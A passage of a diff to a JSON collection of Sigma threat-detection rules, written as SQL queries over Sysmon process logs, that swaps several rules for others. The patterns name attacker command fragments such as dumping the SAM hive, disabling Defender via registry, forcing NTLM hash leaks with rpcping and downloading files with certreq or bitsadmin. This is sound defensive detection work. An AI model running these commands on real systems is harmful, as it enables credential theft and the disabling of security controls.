for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", - "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "title": "New Root Certificate Installed Via Certutil.EXE", + "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", + "status": "test", + "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "proc_creation_win_certutil_certificate_installation.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "status": "test", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.t1127" ], "falsepositives": [ - "AppvClient", - "CCM" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "title": "Conhost Parent Process Executions", + "id": "7dc2dedd-7603-461a-bc13-15803d132355", "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" - ], - "filename": "proc_creation_win_susp_parents.yml" - }, - { - "title": "New User Created Via Net.EXE", - "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "status": "test", - "description": "Identifies the creation of local users via the net.exe command.", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "author": "omkar72", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND Image LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_user_add.yml" + "filename": "proc_creation_win_conhost_susp_child_process.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "UAC Bypass via Windows Firewall Snap-In Hijack", + "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "author": "Tim Rauch", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Capture Credentials with Rpcping.exe", - "id": "93671f99-04eb-4ab4-a161-70d446a84003", - "status": "test", - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "author": "Julia Fomina, oscd.community", + "title": "Sysinternals PsService Execution", + "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "status": "experimental", + "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Unlikely" + "Legitimate use of PsService by an administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psservice.exe' OR (Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rpcping_credential_capture.yml" + "filename": "proc_creation_win_sysinternals_psservice.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "title": "Windows Binary Executed From WSL", + "id": "ed825c86-c009-4014-b413-b76003e33d35", + "status": "experimental", + "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1202" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", - "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "title": "Monitoring For Persistence Via BITS", + "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "status": "test", + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1197" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" }, { - "title": "Taskmgr as Parent", - "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", "status": "test", - "description": "Detects the creation of a process from Windows task manager", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\taskmgr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\resmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_taskmgr_susp_child_process.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", - "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" + "attack.execution", + "attack.persistence", + "attack.t1059" ], "falsepositives": [ - "Inventory tool runs", - "Administrative activity" + "Legitimate use by administrator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE 